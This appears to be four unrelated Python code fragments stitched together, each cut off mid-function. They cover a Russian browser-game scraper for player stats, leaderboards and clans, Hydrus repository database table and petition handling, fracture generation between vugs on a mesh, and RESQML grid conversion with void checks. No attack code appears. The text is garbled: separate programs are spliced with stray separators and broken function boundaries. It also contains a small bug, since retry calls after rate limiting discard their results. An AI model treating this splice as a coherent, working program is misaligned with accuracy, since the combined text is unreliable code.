data["level"] = elem.split(",")[1].split("уровень")[0].replace(" ", "")
if "Статус" in elem: #Узнаем статус
data["status"] = " ".join(elem.split(":")[1:])
if "Опыт" in elem: #Узнаем текущий опыт и опыт необходимый для перехода на следующий уровень
data["exp"] = elem.split(":")[1].split("/")[0].replace(" ", "")
data["exp_max"] = elem.split(":")[1].split("/")[1].replace(" ", "")
if "Доблесть" in elem: #Узнаем текущий уровень доблести
data["valor_level"] = elem.split(":")[1].split("у")[0].replace(" ", "")
if "Сила" in elem: #Узнаем текущую силу
data["strength"] = elem.split(":")[1].replace(" ", "")
if "Здоровье" in elem: #Узнаем текущее здоровье
data["health"] = elem.split(":")[1].replace(" ", "")
if "Броня" in elem: #Узнаем текущую броню
data["defense"] = elem.split(":")[1].replace(" ", "")
if "Золото" in elem: #Узнаем текущее кол-во золота
data["gold"] = elem.split(":")[1].replace(" ", "")
if "Серебро" in elem: #Узнаем текущее кол-во серебра
data["silver"] = elem.split(":")[1].replace(" ", "")
if "valor_level" not in data: #Если не удалось узнать доблесть
if id == None: #В своем профиле
response = self.session.get(self.url+"valor_info", headers=self.headers) #Посылаем GET запрос
html = response.text
soup = BS(html, "html.parser")
elems = soup.findAll("div", class_="mlr10")
for elem in elems:
if "уровень" in str(elem):
data["valor_level"] = elem.text.split(":")[1].split("Ваши")[0].replace(" ", "").replace("\n", "")
else: #В чужом
response = self.session.get(self.url+"valor_info?player_id="+id, headers=self.headers) #Посылаем GET запрос
html = response.text
soup = BS(html, "html.parser")
elems = soup.findAll("div", class_="mt10")
for elem in elems:
elem = elem.text.replace("\n", "").replace("\t", "")
if "За" in elem:
data["valor_level"] = elem.split("й")[1].split("у")[0].replace(" ", "")
links = soup.findAll("a")
for link in links:
if "player_id" in link["href"]:
data["player_id"] = link["href"].split("=")[1].split("&")[0]
return data
def best(self, pages: int = 1, category: int = 1): #Список лучших
if pages > 500: pages = 500 #Проверка на максимальное кол-во страниц
data = {} #Возвращаемый словарь
for i in range(1, pages+1):
player_list = {} #Нужная вещь
a = [] #Нужная вещь x2
i = str(i)
urls = ["?pvp=0&page="+i, "/clans&page="+i, "?pvp=1&page="+i, "?pvp=2&page="+i, "/fightValor?page="+i, "/invasionValor?page="+i, "/tourneyValor?page="+i, "/towerValor?page="+i, "/throneValor?page="+i, "/clanTourneyValor?page="+i, "/armyValor?page="+i, "/clanSurvivalValor?page="+i]
response = self.session.get(self.url+"best"+urls[category-1], headers=self.headers) #Посылаем GET запрос
html = response.text #Получаем HTML код страницы
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.best(pages, category)
if "Рейтинг лучших" or "Боевая доблесть" in html: #Проверяем, нужную ли страницу нашли
soup = BS(html, "html.parser")
rating_ = soup.find("table", class_="wa").findAll("td", class_="yell") #Находим позиции и рейтинг игроков
names = soup.find("table", class_="wa").findAll("a") #Находим имена игроков
position = [] #Нужная вещь x3
rating = [] #Нужная вещь x4
for j in range(0, len(rating_)):
if j % 2 == 0: #Если индекс элемента четный то это позиция игрока
position.append(rating_[j].text)
else: #Иначе его рейтинг
rating.append(rating_[j].text)
for j in range(0, 16 if category != 2 else 15):
if position[j] != "10000": #Условие чтобы ваш профиль не отображался
player_list["position"] = position[j]
player_list["name"] = names[j].text
player_list["rating"] = rating[j]
a.append(player_list)
player_list = {}
data[i] = a
return data
def train(self): #Узнать наш уровень тренировки
data = { #Заготовка на вывод
"strength": {},
"health": {},
"defense": {}
}
response = self.session.get(self.url+"train", headers=self.headers) #Посылаем GET запрос
html = response.text #Получаем HTML код страницы
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.train()
soup = BS(html, "html.parser")
elems = soup.findAll("span", class_="darkgreen_link font_15") #Находим прибавки к аттрибутам
data["strength"]["bonus"] = elems[0].text
data["health"]["bonus"] = elems[1].text
data["defense"]["bonus"] = elems[2].text
elems = soup.findAll("div", class_="ml68") #Находим уровни тренировок
levels = []
for elem in elems:
levels.append(elem.text.split(":")[1].split("из")[0].replace(" ", "")) #Обрабатываем их
data["strength"]["level"] = levels[0]
data["health"]["level"] = levels[1]
data["defense"]["level"] = levels[2]
elems = soup.findAll("span", class_="ur") #Находим цену и валюту следующего улучшения
cost = []
currency = []
for elem in elems: #Обрабатываем их
cost.append(elem.text.split("за ")[1])
currency_ = elem.find_next("img")["src"].split("/")[-1]
if currency_ == "gold.png":
currency.append("gold")
else:
currency.append("silver")
data["strength"]["cost"] = cost[0]
data["health"]["cost"] = cost[1]
data["defense"]["cost"] = cost[2]
data["strength"]["currency"] = currency[0]
data["health"]["currency"] = currency[1]
data["defense"]["currency"] = currency[2]
return data
def task(self, category: int = 1): #Узнать сюжетные/ежедневные задания
data = {} #Заготовка на выход
task = {} #Нужная вещь
categories = ["task", "task/daily"]
response = self.session.get(self.url+categories[category-1], headers=self.headers) #Посылаем GET запрос
html = response.text #Получаем HTML код страницы
if "Вы кликаете слишком быстро" in html:
time.sleep(2)
self.task(category)
soup = BS(html, "html.parser")
elems = soup.findAll("div", class_="wr8") #Находим нужные элементы
result = [] #Будем сохранять необработанные данные сюда
task_ = [] #Список для текстов заданий
level = [] #Текущий прогресс на задании
level_required = [] #Нужный уровень для выполнения
for elem in elems:
result.append(elem.text.replace("\n", "").replace("\t", "")) #Обрабатываем каждый элемент и сохраняем его
result = result[1:] #Обрезаем заголовок
for i in result: #Обрабатываем каждый пункт и сохраняем их
task_.append(i.split(":")[0].split("Прогресс")[0].strip())
level.append(i.split(":")[1].split("из")[0].replace(" ", ""))
level_required.append(i.split("из ")[1].replace(" ", ""))
for i in range(0, len(task_)): #Записываем их в словарь data
task["task"] = task_[i]
task["level"] = level[i]
task["level_required"] = level_required[i]
data[str(i)] = task
task = {}
return data
def clan(self, id: str): #Узнаем информацию о клане (ВАЖНО! Может работать некорректно с некоторыми кланами. У всех разный HTML код, в будущем возможно эта проблема решится)
data = {} #Заготовка на вывод
response = self.session.get(self.url+"clan?id="+str(id), headers=self.headers) #Посылаем GET запрос
html = response.text #Получаем HTML код страницы
if "Вы кликаете слишком быстро" in html: #Проверка на нужную страницу
time.sleep(2)
self.clan(id)
if "Хочу в клан!" in html: #Проверка что данный клан существует
return "Incorect clan id at 'clan'"
if "О клане" in html: #Проверка на нужную страницу x2
soup = BS(html, "html.parser")
try:
data["name"] = soup.find("div", class_="rr").text.replace("\n", "").replace("\t", "")
except AttributeError:
data["name"] = soup.find("div", class_="bold").text.replace("\n", "").replace("\t", "") #Получаем название клана
data["description"] = soup.find("span", class_="green_dark").text.replace("\n", "").replace("\t", "")[2:]
elems = soup.find("div", class_="mlr10").text.split("\n")
for elem in elems: #Получаем информацию клана
if elem != "":
if "О клане" not in elem:
if "Основан" in elem:
data["founded"] = elem.split(":")[1].strip()
elif "Уровень" in elem:
data["level"] = elem.split(":")[1].strip()
elif "Опыт" in elem:
data["exp"] = elem.split(":")[1].split("из")[0].replace(" ", "")
try:
data["exp_required"] = elem.split(":")[1].split("из")[1].replace(" ", "")
except:
pass
elem = soup.findAll("a", class_="mb2")[2]
data["buildings_percent"] = elem.text.split("(")[1].split(")")[0]
time.sleep(0.5)
response = self.session.get(self.url+"builds?id="+str(id), headers=self.headers) #Посылаем GET запрос
html | |
'sibling_timestamp' ] )
self._Execute( 'CREATE TABLE ' + pending_tag_siblings_table_name + ' ( bad_master_tag_id INTEGER, good_master_tag_id INTEGER, account_id INTEGER, reason_id INTEGER, PRIMARY KEY ( bad_master_tag_id, account_id ) ) WITHOUT ROWID;' )
self._CreateIndex( pending_tag_siblings_table_name, [ 'account_id', 'reason_id' ] )
self._Execute( 'CREATE TABLE ' + petitioned_tag_siblings_table_name + ' ( bad_service_tag_id INTEGER, good_service_tag_id INTEGER, account_id INTEGER, reason_id INTEGER, PRIMARY KEY ( bad_service_tag_id, account_id ) ) WITHOUT ROWID;' )
self._CreateIndex( petitioned_tag_siblings_table_name, [ 'account_id', 'reason_id' ] )
#
( update_table_name ) = GenerateRepositoryUpdateTableName( service_id )
self._Execute( 'CREATE TABLE ' + update_table_name + ' ( master_hash_id INTEGER PRIMARY KEY );' )
def _RepositoryCreateUpdate( self, service_key, begin, end ):
service_id = self._GetServiceId( service_key )
( name, ) = self._Execute( 'SELECT name FROM services WHERE service_id = ?;', ( service_id, ) ).fetchone()
HydrusData.Print( 'Creating update for ' + repr( name ) + ' from ' + HydrusData.ConvertTimestampToPrettyTime( begin, in_utc = True ) + ' to ' + HydrusData.ConvertTimestampToPrettyTime( end, in_utc = True ) )
updates = self._RepositoryGenerateUpdates( service_id, begin, end )
update_hashes = []
total_definition_rows = 0
total_content_rows = 0
if len( updates ) > 0:
for update in updates:
num_rows = update.GetNumRows()
if isinstance( update, HydrusNetwork.DefinitionsUpdate ):
total_definition_rows += num_rows
elif isinstance( update, HydrusNetwork.ContentUpdate ):
total_content_rows += num_rows
update_bytes = update.DumpToNetworkBytes()
update_hash = hashlib.sha256( update_bytes ).digest()
dest_path = ServerFiles.GetExpectedFilePath( update_hash )
with open( dest_path, 'wb' ) as f:
f.write( update_bytes )
update_hashes.append( update_hash )
( update_table_name ) = GenerateRepositoryUpdateTableName( service_id )
master_hash_ids = self._GetMasterHashIds( update_hashes )
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + update_table_name + ' ( master_hash_id ) VALUES ( ? );', ( ( master_hash_id, ) for master_hash_id in master_hash_ids ) )
HydrusData.Print( 'Update OK. ' + HydrusData.ToHumanInt( total_definition_rows ) + ' definition rows and ' + HydrusData.ToHumanInt( total_content_rows ) + ' content rows in ' + HydrusData.ToHumanInt( len( updates ) ) + ' update files.' )
return update_hashes
def _RepositoryDeleteFiles( self, service_id, account_id, service_hash_ids, timestamp ):
( current_files_table_name, deleted_files_table_name, pending_files_table_name, petitioned_files_table_name, ip_addresses_table_name ) = GenerateRepositoryFilesTableNames( service_id )
select_statement = 'SELECT service_hash_id FROM ' + current_files_table_name + ' WHERE service_hash_id = ?;'
valid_service_hash_ids = self._STL( self._ExecuteManySelectSingleParam( select_statement, service_hash_ids ) )
self._RepositoryRewardFilePetitioners( service_id, valid_service_hash_ids, 1 )
self._ExecuteMany( 'DELETE FROM ' + current_files_table_name + ' WHERE service_hash_id = ?', ( ( service_hash_id, ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'DELETE FROM ' + petitioned_files_table_name + ' WHERE service_hash_id = ?', ( ( service_hash_id, ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + deleted_files_table_name + ' ( service_hash_id, account_id, file_timestamp ) VALUES ( ?, ?, ? );', ( ( service_hash_id, account_id, timestamp ) for service_hash_id in valid_service_hash_ids ) )
def _RepositoryDeleteMappings( self, service_id, account_id, service_tag_id, service_hash_ids, timestamp ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateRepositoryMappingsTableNames( service_id )
select_statement = 'SELECT service_hash_id FROM ' + current_mappings_table_name + ' WHERE service_tag_id = ' + str( service_tag_id ) + ' AND service_hash_id = ?;'
valid_service_hash_ids = self._STL( self._ExecuteManySelectSingleParam( select_statement, service_hash_ids ) )
self._RepositoryRewardMappingPetitioners( service_id, service_tag_id, valid_service_hash_ids, 1 )
self._ExecuteMany( 'DELETE FROM ' + current_mappings_table_name + ' WHERE service_tag_id = ? AND service_hash_id = ?;', ( ( service_tag_id, service_hash_id ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'DELETE FROM ' + petitioned_mappings_table_name + ' WHERE service_tag_id = ? AND service_hash_id = ?;', ( ( service_tag_id, service_hash_id ) for service_hash_id in valid_service_hash_ids ) )
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + deleted_mappings_table_name + ' ( service_tag_id, service_hash_id, account_id, mapping_timestamp ) VALUES ( ?, ?, ?, ? );', ( ( service_tag_id, service_hash_id, account_id, timestamp ) for service_hash_id in valid_service_hash_ids ) )
def _RepositoryDeleteTagParent( self, service_id, account_id, child_service_tag_id, parent_service_tag_id, timestamp ):
( current_tag_parents_table_name, deleted_tag_parents_table_name, pending_tag_parents_table_name, petitioned_tag_parents_table_name ) = GenerateRepositoryTagParentsTableNames( service_id )
self._RepositoryRewardTagParentPetitioners( service_id, child_service_tag_id, parent_service_tag_id, 1 )
self._Execute( 'DELETE FROM ' + current_tag_parents_table_name + ' WHERE child_service_tag_id = ? AND parent_service_tag_id = ?;', ( child_service_tag_id, parent_service_tag_id ) )
self._Execute( 'DELETE FROM ' + petitioned_tag_parents_table_name + ' WHERE child_service_tag_id = ? AND parent_service_tag_id = ?;', ( child_service_tag_id, parent_service_tag_id ) )
self._Execute( 'INSERT OR IGNORE INTO ' + deleted_tag_parents_table_name + ' ( child_service_tag_id, parent_service_tag_id, account_id, parent_timestamp ) VALUES ( ?, ?, ?, ? );', ( child_service_tag_id, parent_service_tag_id, account_id, timestamp ) )
def _RepositoryDeleteTagSibling( self, service_id, account_id, bad_service_tag_id, good_service_tag_id, timestamp ):
( current_tag_siblings_table_name, deleted_tag_siblings_table_name, pending_tag_siblings_table_name, petitioned_tag_siblings_table_name ) = GenerateRepositoryTagSiblingsTableNames( service_id )
self._RepositoryRewardTagSiblingPetitioners( service_id, bad_service_tag_id, good_service_tag_id, 1 )
self._Execute( 'DELETE FROM ' + current_tag_siblings_table_name + ' WHERE bad_service_tag_id = ? AND good_service_tag_id = ?;', ( bad_service_tag_id, good_service_tag_id ) )
self._Execute( 'DELETE FROM ' + petitioned_tag_siblings_table_name + ' WHERE bad_service_tag_id = ? AND good_service_tag_id = ?;', ( bad_service_tag_id, good_service_tag_id ) )
self._Execute( 'INSERT OR IGNORE INTO ' + deleted_tag_siblings_table_name + ' ( bad_service_tag_id, good_service_tag_id, account_id, sibling_timestamp ) VALUES ( ?, ?, ?, ? );', ( bad_service_tag_id, good_service_tag_id, account_id, timestamp ) )
def _RepositoryDenyFilePetition( self, service_id, service_hash_ids ):
self._RepositoryRewardFilePetitioners( service_id, service_hash_ids, -1 )
( current_files_table_name, deleted_files_table_name, pending_files_table_name, petitioned_files_table_name, ip_addresses_table_name ) = GenerateRepositoryFilesTableNames( service_id )
self._ExecuteMany( 'DELETE FROM ' + petitioned_files_table_name + ' WHERE service_hash_id = ?;', ( ( service_hash_id, ) for service_hash_id in service_hash_ids ) )
def _RepositoryDenyMappingPetition( self, service_id, service_tag_id, service_hash_ids ):
self._RepositoryRewardMappingPetitioners( service_id, service_tag_id, service_hash_ids, -1 )
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateRepositoryMappingsTableNames( service_id )
self._ExecuteMany( 'DELETE FROM ' + petitioned_mappings_table_name + ' WHERE service_tag_id = ? AND service_hash_id = ?;', ( ( service_tag_id, service_hash_id ) for service_hash_id in service_hash_ids ) )
def _RepositoryDenyTagParentPend( self, service_id, child_master_tag_id, parent_master_tag_id ):
self._RepositoryRewardTagParentPenders( service_id, child_master_tag_id, parent_master_tag_id, -1 )
( current_tag_parents_table_name, deleted_tag_parents_table_name, pending_tag_parents_table_name, petitioned_tag_parents_table_name ) = GenerateRepositoryTagParentsTableNames( service_id )
self._Execute( 'DELETE FROM ' + pending_tag_parents_table_name + ' WHERE child_master_tag_id = ? AND parent_master_tag_id = ?;', ( child_master_tag_id, parent_master_tag_id ) )
def _RepositoryDenyTagParentPetition( self, service_id, child_service_tag_id, parent_service_tag_id ):
self._RepositoryRewardTagParentPetitioners( service_id, child_service_tag_id, parent_service_tag_id, -1 )
( current_tag_parents_table_name, deleted_tag_parents_table_name, pending_tag_parents_table_name, petitioned_tag_parents_table_name ) = GenerateRepositoryTagParentsTableNames( service_id )
self._Execute( 'DELETE FROM ' + petitioned_tag_parents_table_name + ' WHERE child_service_tag_id = ? AND parent_service_tag_id = ?;', ( child_service_tag_id, parent_service_tag_id ) )
def _RepositoryDenyTagSiblingPend( self, service_id, bad_master_tag_id, good_master_tag_id ):
self._RepositoryRewardTagSiblingPenders( service_id, bad_master_tag_id, good_master_tag_id, -1 )
( current_tag_siblings_table_name, deleted_tag_siblings_table_name, pending_tag_siblings_table_name, petitioned_tag_siblings_table_name ) = GenerateRepositoryTagSiblingsTableNames( service_id )
self._Execute( 'DELETE FROM ' + pending_tag_siblings_table_name + ' WHERE bad_master_tag_id = ? AND good_master_tag_id = ?;', ( bad_master_tag_id, good_master_tag_id ) )
def _RepositoryDenyTagSiblingPetition( self, service_id, bad_service_tag_id, good_service_tag_id ):
self._RepositoryRewardTagSiblingPetitioners( service_id, bad_service_tag_id, good_service_tag_id, -1 )
( current_tag_siblings_table_name, deleted_tag_siblings_table_name, pending_tag_siblings_table_name, petitioned_tag_siblings_table_name ) = GenerateRepositoryTagSiblingsTableNames( service_id )
self._Execute( 'DELETE FROM ' + petitioned_tag_siblings_table_name + ' WHERE bad_service_tag_id = ? AND good_service_tag_id = ?;', ( bad_service_tag_id, good_service_tag_id ) )
def _RepositoryDrop( self, service_id ):
table_names = []
table_names.extend( GenerateRepositoryMasterMapTableNames( service_id ) )
table_names.extend( GenerateRepositoryFilesTableNames( service_id ) )
table_names.extend( GenerateRepositoryMappingsTableNames( service_id ) )
table_names.extend( GenerateRepositoryTagParentsTableNames( service_id ) )
table_names.extend( GenerateRepositoryTagSiblingsTableNames( service_id ) )
table_names.append( GenerateRepositoryUpdateTableName( service_id ) )
for table_name in table_names:
self._Execute( 'DROP TABLE ' + table_name + ';' )
def _RepositoryGenerateImmediateUpdate( self, service_key, account, begin, end ):
service_id = self._GetServiceId( service_key )
updates = self._RepositoryGenerateUpdates( service_id, begin, end )
return updates
def _RepositoryGenerateUpdates( self, service_id, begin, end ):
MAX_DEFINITIONS_ROWS = 50000
MAX_CONTENT_ROWS = 250000
MAX_CONTENT_CHUNK = 25000
updates = []
definitions_update_builder = HydrusNetwork.UpdateBuilder( HydrusNetwork.DefinitionsUpdate, MAX_DEFINITIONS_ROWS )
content_update_builder = HydrusNetwork.UpdateBuilder( HydrusNetwork.ContentUpdate, MAX_CONTENT_ROWS )
( service_hash_ids_table_name, service_tag_ids_table_name ) = GenerateRepositoryMasterMapTableNames( service_id )
for ( service_hash_id, hash ) in self._Execute( 'SELECT service_hash_id, hash FROM ' + service_hash_ids_table_name | |
compute_fractures(self, vols_per_ellipsoid, centers):
"""
Generate fractures according to the instance parameters
`fracture_shape` and `num_fractures`.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each vug ellipsoid center.
Returns
------
None
"""
if self.fracture_shape == "cylinder":
self.compute_fractures_as_cylinders(vols_per_ellipsoid, centers)
elif self.fracture_shape == "box":
self.compute_fractures_as_boxes(vols_per_ellipsoid, centers)
elif self.fracture_shape == "ellipsoid":
self.compute_fractures_as_ellipsoids(vols_per_ellipsoid, centers)
def compute_fractures_as_cylinders(self, vols_per_ellipsoid, centers):
"""
Generates random fractures shaped as cylinders connecting two vugs,
and computes the volumes inside them. If a volumes is inside a
fracture, then the property `fracture` of the mesh data
structure is set to 1.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each vug ellipsoid center.
Returns
------
None
"""
selected_pairs = []
for i in range(self.num_fractures):
# Find a pair of ellipsoids that are not overlapped and are
# not already connected by a fracture.
while True:
e1, e2 = self.random_rng.choice(
np.arange(self.num_ellipsoids), size=2, replace=False)
if (e1, e2) not in selected_pairs and \
rng.intersect(vols_per_ellipsoid[e1], vols_per_ellipsoid[e2]).empty():
selected_pairs.extend([(e1, e2), (e2, e1)])
break
# Calculating the cylinder's parameters.
L = np.linalg.norm(centers[e1] - centers[e2]) # Length
r = 10 / L # Radius
print("Creating fracture {} of {}".format(i+1, self.num_fractures))
self.check_intersections_for_cylinders(
r, L, centers[e1], centers[e2])
def compute_fractures_as_boxes(self, vols_per_ellipsoid, centers):
"""
Generates random fractures shaped as boxes connecting two vugs,
and computes the volumes inside them. If a volumes is inside a
fracture, then the property `fracture` of the mesh data
structure is set to 1.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each ellipsoid center.
Returns
------
None
"""
# Compute minimal parameter size for boxes.
all_edges_endpoints = self.mesh.edges.connectivities[:]
N = len(all_edges_endpoints)
all_edges_coords = self.mesh.nodes.coords[all_edges_endpoints.flatten()].reshape((N, 2, 3))
edges_length = np.linalg.norm(all_edges_coords[:, 0, :] - all_edges_coords[:, 1, :], axis=1)
min_height = edges_length.min()
min_length = edges_length.max()
selected_pairs = []
for i in range(self.num_fractures):
# Find a pair of ellipsoids that are not overlapped and are
# not already connected by a fracture.
while True:
e1, e2 = self.random_rng.choice(
np.arange(self.num_ellipsoids), size=2, replace=False)
if (e1, e2) not in selected_pairs and \
rng.intersect(vols_per_ellipsoid[e1], vols_per_ellipsoid[e2]).empty():
selected_pairs.extend([(e1, e2), (e2, e1)])
break
d = np.linalg.norm(centers[e1] - centers[e2])
l = min_length if min_length > d / 20 else d / 20
h = min_height
print("Creating fracture {} of {}".format(i+1, self.num_fractures))
self.check_intersections_for_boxes(
centers[e1], centers[e2], d, l, h)
def compute_fractures_as_ellipsoids(self, vols_per_ellipsoid, centers):
"""
Generates random fractures shaped as ellipsoids connecting two vugs,
and computes the volumes inside them. If a volumes is inside a
fracture, then the property `fracture` of the mesh data
structure is set to 1.
Parameters
----------
vols_per_ellipsoid : list
A list of Pymoab's ranges describing the volumes
inside each ellipsoid.
centers : numpy.array
Array containing the cartesian coordinates of
each ellipsoid center.
Returns
------
None
"""
# Compute minimal parameter size for ellipsoids.
all_edges_endpoints = self.mesh.edges.connectivities[:]
N = len(all_edges_endpoints)
all_edges_coords = self.mesh.nodes.coords[all_edges_endpoints.flatten()].reshape((N, 2, 3))
edges_length = np.linalg.norm(all_edges_coords[:, 0, :] - all_edges_coords[:, 1, :], axis=1)
param_c = edges_length.min()
selected_pairs = []
for i in range(self.num_fractures):
# Find a pair of ellipsoids that are not overlapped and are
# not already connected by a fracture.
while True:
e1, e2 = self.random_rng.choice(
np.arange(self.num_ellipsoids), size=2, replace=False)
if (e1, e2) not in selected_pairs and \
rng.intersect(vols_per_ellipsoid[e1], vols_per_ellipsoid[e2]).empty():
selected_pairs.extend([(e1, e2), (e2, e1)])
break
print("Creating fracture {} of {}".format(
i + 1, self.num_fractures))
c1, c2 = centers[e1], centers[e2]
d = np.linalg.norm(c1 - c2)
params = np.array((d / 2, d / 20, param_c))
self.check_intersections_for_ellipsoids(c1, c2, params)
def check_intersections_for_cylinders(self, R, L, c1, c2):
"""
Check which volumes are inside the fracture.
Parameters
----------
R : float
Cylinder's radius
L : float
Cylinder's length
c1 : numpy.array
Left end of the cylinder's axis.
c2 : numpy.array
Right end of the cylinder's axis.
Returns
------
None
"""
vertices = self.mesh.nodes.coords[:]
# Cylinder's vector parameters.
e = c2 - c1
m = np.cross(c1, c2)
# Calculating the distance between the vertices and the main axis.
d_vector = m + np.cross(e, vertices)
d = np.linalg.norm(d_vector, axis=1) / L
# Computing the projection of the vertices onto the cylinder's axis.
u = vertices - c1
proj_vertices = u.dot(e) / L
# Checking which vertices are inside the cylinder.
vertices_in_cylinder = self.mesh.nodes.all[(d <= R) & (
proj_vertices >= 0) & (proj_vertices <= L)]
if len(vertices_in_cylinder) > 0:
volumes_in_cylinder = self.mesh.nodes.bridge_adjacencies(vertices_in_cylinder,
"edges", "volumes").ravel()
if volumes_in_cylinder.dtype == "object":
volumes_in_cylinder = np.concatenate(volumes_in_cylinder)
volumes_in_cylinder = np.unique(volumes_in_cylinder)
volumes_vug_value = self.mesh.vug[volumes_in_cylinder].flatten()
non_vug_volumes = volumes_in_cylinder[volumes_vug_value == 0]
self.mesh.vug[non_vug_volumes] = 2
self.check_intersections_along_axis(c1, c2)
def check_intersections_for_boxes(self, c1, c2, d, l, h):
"""
Check which volumes are inside the box shaped fracture.
Parameters
----------
c1 : numpy.array
Left end of the cylinder's axis.
c2 : numpy.array
Right end of the cylinder's axis.
d: float
Depth of box.
l: float
Length of box.
h: float
Height of box.
Returns
------
None
"""
# Box center.
center = (c1 + c2) / 2
# Defining an orientation vector so we can compute rotations.
u = np.array([d / 2, 0.0, 0.0])
v = c1 - center
R = rotation_to_align(u, v)
# Compute the rotated axis.
rotated_ax = np.array([1.0, 0.0, 0.0]).dot(R)
rotated_ay = np.array([0.0, 1.0, 0.0]).dot(R)
rotated_az = np.array([0.0, 0.0, 1.0]).dot(R)
# Compute volumes inside the box (what's in the box!?).
vertices = self.mesh.nodes.coords[:]
X = vertices - center
vertices_in_x_range = np.abs(X.dot(rotated_ax)) <= (d / 2)
vertices_in_y_range = np.abs(X.dot(rotated_ay)) <= (l / 2)
vertices_in_z_range = np.abs(X.dot(rotated_az)) <= (h / 2)
vertices_handles = self.mesh.nodes.all[vertices_in_x_range & vertices_in_y_range & vertices_in_z_range]
if len(vertices_handles) > 0:
vols_in_fracture = np.concatenate(self.mesh.nodes.bridge_adjacencies(
vertices_handles, "edges", "volumes")).ravel()
unique_vols_in_fracture = np.unique(vols_in_fracture)
unique_volumes_vug_values = self.mesh.vug[unique_vols_in_fracture].flatten()
non_vug_volumes = unique_vols_in_fracture[unique_volumes_vug_values == 0]
self.mesh.vug[non_vug_volumes] = 2
self.check_intersections_along_axis(c1, c2)
def check_intersections_for_ellipsoids(self, c1, c2, params):
"""
Check which volumes are inside the ellipsoid shaped fracture.
Parameters
----------
c1 : numpy.array
Left end of the cylinder's axis.
c2 : numpy.array
Right end of the cylinder's axis.
Returns
------
None
"""
# Ellipsoid's parameters
center = (c1 + c2) / 2
# Defining orientation vectors.
u = np.array([params[0], 0.0, 0.0])
v = c1 - center
R = rotation_to_align(u, v)
vertices = self.mesh.nodes.coords[:]
X = (vertices - center).dot(R.T)
vertices_in_ellipsoid = ((X / params)**2).sum(axis=1)
vertices_handles = self.mesh.nodes.all[vertices_in_ellipsoid < 1]
if len(vertices_handles) > 0:
vols_in_fracture = np.concatenate(self.mesh.nodes.bridge_adjacencies(
vertices_handles, "edges", "volumes")).ravel()
unique_vols_in_fracture = np.unique(vols_in_fracture)
unique_volumes_vug_values = self.mesh.vug[unique_vols_in_fracture].flatten()
non_vug_volumes = unique_vols_in_fracture[unique_volumes_vug_values == 0]
self.mesh.vug[non_vug_volumes] = 2
self.check_intersections_along_axis(c1, c2)
def check_intersections_along_axis(self, c1, c2):
# Check for intersection between the box's axis and the mesh faces.
faces = self.mesh.faces.all[:]
num_faces = len(faces)
faces_nodes_handles = self.mesh.faces.connectivities[:]
num_vertices_of_volume = faces_nodes_handles.shape[1]
faces_vertices = self.mesh.nodes.coords[faces_nodes_handles.flatten()].reshape(
(num_faces, num_vertices_of_volume, 3))
# Plane parameters of each face.
R_0 = faces_vertices[:, 0, :]
N = np.cross(faces_vertices[:, 1, :] - R_0, faces_vertices[:, 2, :] - R_0)
# Compute the parameters of the main axis line.
num = np.einsum("ij,ij->i", N, R_0 - c1)
denom = N.dot(c2 - c1)
non_zero_denom = denom[np.abs(denom) > 1e-6]
non_zero_num = num[np.abs(denom) > 1e-6]
r = non_zero_num / non_zero_denom
# Check faces intersected by the axis' line.
filtered_faces = faces[np.abs(denom) > 1e-6]
filtered_faces = filtered_faces[(r >= 0) & (r <= 1)]
filtered_nodes = faces_vertices[np.abs(denom) > 1e-6]
filtered_nodes = filtered_nodes[(r >= 0) & (r <= 1)]
r = r[(r >= 0) & (r <= 1)]
P = c1 + r[:, np.newaxis]*(c2 - c1)
# Compute the intersection point between the face plane and the axis
# line and check if such point is in the face.
angle_sum = np.zeros(filtered_nodes.shape[0])
for i in range(num_vertices_of_volume):
p0, p1 = filtered_nodes[:, i, :], filtered_nodes[:, (i+1) % num_vertices_of_volume, :]
a = p0 - P
b = p1 - P
norm_prod = np.linalg.norm(a, axis=1)*np.linalg.norm(b, axis=1)
# If the point of intersection is too close to a vertex, then
# take it as | |
geometry
if geometry_defined_everywhere:
full_mask = None
masked_cp_array = ma.masked_array(cp_array, mask = ma.nomask)
log.info('geometry present for all cells')
else:
full_mask = cp_nan_mask.reshape((nk, nj, ni, 1)).repeat(24, axis = 3).reshape((nk, nj, ni, 2, 2, 2, 3))
masked_cp_array = ma.masked_array(cp_array, mask = full_mask)
log.info('number of cells without geometry: ' + str(np.count_nonzero(cp_nan_mask)))
# convert to resqml
k_gaps = None
k_gap_after_layer = None
k_gap_raw_index = None
if nk > 1:
# check for (vertical) voids, or un-pillar-like anomalies, which will require k gaps in the resqml ijk grid
log.debug('checking for voids')
gap = masked_cp_array[1:, :, :, 0, :, :, :] - masked_cp_array[:-1, :, :, 1, :, :, :]
max_gap_by_layer_and_xyz = np.max(np.abs(gap), axis = (1,2,3,4))
max_gap = np.max(max_gap_by_layer_and_xyz)
log.debug('maximum void distance: {0:.3f}'.format(max_gap))
if max_gap > max_z_void:
log.warning('maximum void distance exceeds limit, grid will include k gaps')
k_gaps = 0
k_gap_after_layer = np.zeros((nk - 1, ), dtype = bool)
k_gap_raw_index = np.empty((nk, ), dtype = int)
k_gap_raw_index[0] = 0
for k in range(nk - 1):
max_layer_gap = np.max(max_gap_by_layer_and_xyz[k])
if max_layer_gap > max_z_void:
k_gap_after_layer[k] = True
k_gaps += 1
elif max_layer_gap > 0.0:
# close void (includes shifting x & y)
log.debug('closing void below layer (0 based): ' + str(k))
layer_gap = gap[k] * 0.5
layer_gap_unmasked = np.where(gap[k].mask, 0.0, layer_gap)
masked_cp_array[k + 1, :, :, 0, :, :, :] -= layer_gap_unmasked
